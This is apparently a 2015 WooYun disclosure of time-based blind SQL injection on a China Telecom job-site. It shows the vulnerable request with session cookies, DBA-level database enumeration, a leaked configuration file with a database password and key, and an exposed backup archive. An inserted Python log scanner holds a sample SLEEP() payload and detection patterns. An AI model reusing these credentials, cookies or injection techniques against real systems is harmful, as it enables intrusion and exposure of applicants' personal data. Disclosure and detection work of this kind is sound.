
Vulnerability summary

Defect ID: wooyun-2015-0142490

Title: SQL injection in a China Telecom site (time-based blind / DBA privileges / large-scale information disclosure)

Vendor: China Telecom

Author: 路人甲

Submitted: 2015-09-24 23:03

Fixed: 2015-11-13 10:08

Published: 2015-11-13 10:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-24: Details sent to the vendor, awaiting vendor handling
2015-09-29: CNCERT could not yet reach the responsible unit; details disclosed only to the notifying agency
2015-10-09: Details disclosed to core white hats and domain experts
2015-10-19: Details disclosed to regular white hats
2015-10-29: Details disclosed to intern white hats
2015-11-13: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

URL: http://**.**.**.**
Test request:

GET /shixibao/cp.php?residecity=&name=aaa&username=&searchsubmit=%B2%E9%D5%D2&ac=friend&op=search&type=base HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Referer: http://**.**.**.**/shixibao/cp.php?ac=friend&op=search&view=reside
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=9pn1vm0akovauie5a335c5tvb2; lvid=b19139a2392c542f441d7e58c619e264; nvid=1; s_pers=%20s_fid%3D45636F5C10EB727B-2D660E17E30AF73F%7C1505822950638%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Deshipeship-189-all%253D%252526pid%25253D%2525252Freg2%252526pidt%25253D1%252526oid%25253Djavascript%2525253A%2525253B%252526ot%25253DA%3B; DQMHStanduserId=20150000000032913522; userId=1%7C20150000000032913522; dqmhIpCityInfos=%E5%8C%97%E4%BA%AC%E5%B8%82+%E8%81%94%E9%80%9A; loginStatus=logined; __qc_wId=356; pgv_pvid=5871468180; trkHmPageName=%2Fbj%2F; trkHmCoords=0; trkHmCity=0; trkHmLinks=0; cityCode=bj; SHOPID_COOKIEID=10001; s_cc=true; s_fid=48FC7A85226ECCFE-18831160BEDE3A5D; s_sq=eshipeship-189-all%3D%2526pid%253D%25252Fdqmh%25252FuserCenter%25252FmyOrderInfoList.do%25253Fmethod%25253DmangeAddr%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252F**.**.**.**%25252Fdqmh%25252FssoLink.do%25253Fmethod%25253Dskip%252526platNo%25253D93505%252526toStUrl%25253Dhttp%25253A%25252F%25252F**.**.**.**%2526ot%253DA; trkHmClickCoords=1284%2C8; LSID=aSEUDBw0HFa8WvQGL-; uchome_view_blogid=205; jiathis_rdc=%7B%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52131%26do%3Dblog%26id%3D206%22%3A0%7C1442665279182%2C%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52114%26do%3Dblog%26id%3D205%22%3A%220%7C1442665846816%22%7D; jnfbygbookbid=1; jnfbyloginnum=2; jnfbylastlogintime=1442666836; uchome_seccode=744dI4LaOKteAVAbz6x7ThTGunfUfl3SGWhujNXCP8LL; uchome_auth=b589k0qHxDIqjn39rocSgwJnruaOoGoBmKJdjDWIfJuO40SCQCR3ymxPdtHYKPyw5w3i5lvXx0EgEWG30JINuKiCIQ; uchome_loginuser=testwooyun; uchome_jnfbymluserid=52131; uchome_synfriend=1; uchome_reurl=%252Fshixibao%252Fcp.php%253Fac%253Dzhiwei_result_detail%2526ignore%253D1%2526jobid%253D6656; uchome_checkpm=1; uchome_sendmail=1; CNZZDATA1252975852=2119416073-1442662706-null%7C1442662706

Proof of vulnerability:

(screenshot: 32.jpg)


Privileges and user:

current user is DBA:    True
current user: 'admin@%'


Databases (16):

available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen


shixibao_uchome:

[182 tables]


shixibao_uchome -> mm_userinfo: 35,895 user profile records
Some additional leaks:
1. http://**.**.**.**/shixibao/config.php.bak

...Application management -> View this application -> copy the corresponding configuration values to replace these)
define('UC_CONNECT', 'mysql');                  // How to connect to UCenter: mysql/NULL; empty (default) means fsockopen(); mysql connects to the database directly and is recommended for efficiency
define('UC_DBHOST', '**.**.**.**');             // UCenter database host
define('UC_DBUSER', 'admin');                   // UCenter database user
define('UC_DBPW', 'ctbri4008118114');           // UCenter database password
define('UC_DBNAME', 'shixibao_uc');             // UCenter database name
define('UC_DBCHARSET', 'gbk');                  // UCenter database charset
define('UC_DBTABLEPRE', '`shixibao_uc`.uc_');   // UCenter database table prefix
define('UC_DBCONNECT', '0');                    // UCenter persistent database connection: 0 = off, 1 = on
define('UC_KEY', 'abc123');                     // Communication key shared with UCenter; must match UCenter's setting
define('UC_API', 'http://**.**.**.**/shixibao/ucenter'); // UCenter URL; avatar calls depend on this constant
define('UC_CHARSET', 'gbk');                    // UCenter charset
define('UC_IP', '**.**.**.**');                 // UCenter IP; set this when UC_CONNECT is not mysql and the application server cannot resolve the domain
define('UC_APPID', '4');                        // ID of this application
define('UC_PPP', 20);

2. Backup:
http://**.**.**.**/shixibao/data.rar
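As an added defender-side example (not part of the report), the following Python scans constructed web-server access-log lines for the two exposures the report describes: time-based blind injection attempts against a query parameter such as name on cp.php, and successful downloads of backup artifacts such as config.php.bak and data.rar. The log format, the thresholds and the sample lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the report): "METHOD PATH STATUS TIME_MS".
SAMPLE_LOG = """\
GET /shixibao/cp.php?ac=friend&op=search&type=base&name=aaa 200 110
GET /shixibao/cp.php?ac=friend&op=search&type=base&name=aaa%27%20AND%20SLEEP(5)--%20 200 5230
GET /shixibao/cp.php?ac=friend&op=search&type=base&name=bbb 200 95
GET /shixibao/space.php?uid=52131&do=blog 200 80
GET /shixibao/config.php.bak 200 12
GET /shixibao/data.rar 200 1900
GET /shixibao/config.php 200 35
"""

# Hypothetical thresholds and patterns; tune SLOW_MS to the endpoint's own baseline.
SLOW_MS = 3000
TIME_DELAY_RE = re.compile(r"\b(sleep|benchmark|waitfor|pg_sleep)\s*\(", re.I)
BACKUP_RE = re.compile(r"\.(bak|old|orig|swp|rar|zip|7z|tar|gz|sql)$", re.I)


@dataclass
class Finding:
    line_no: int
    kind: str
    detail: str


def analyze(log_text: str) -> list:
    # One Finding per indicator; a single request may yield several.
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        _method, target, status, ms = line.split()
        parts = urlsplit(target)
        # 1) Backup or archive artifacts that the server actually handed out.
        if status == "200" and BACKUP_RE.search(parts.path):
            findings.append(Finding(no, "exposed-backup", parts.path))
            continue
        # 2) Time-based blind SQLi indicators: a delay primitive in any percent-decoded
        #    parameter value, or a response far slower than the endpoint normally takes.
        for key, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if TIME_DELAY_RE.search(value):
                    findings.append(Finding(no, "sqli-time-delay", f"{key}={value}"))
        if parts.path.endswith(".php") and int(ms) > SLOW_MS:
            findings.append(Finding(no, "slow-response", f"{parts.path} {ms}ms"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The slow-response rule catches delay-based probing even when the payload is obfuscated, while the backup rule only fires on a 200 so that denied or missing files do not create noise.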

Fix recommendation:

Protect job applicants' information.

Copyright: when reposting, credit the source 路人甲@乌云.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-09-29 10:06

Vendor reply:

CNVD confirmed the reported situation; it has been forwarded via CNCERT to China Telecom Group, which will coordinate handling with the website's operating unit.

Latest status:

None yet